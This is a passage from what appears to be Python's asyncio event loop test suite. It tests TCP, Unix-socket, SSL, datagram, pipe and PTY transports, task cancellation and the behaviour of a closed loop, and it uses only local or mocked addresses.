self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
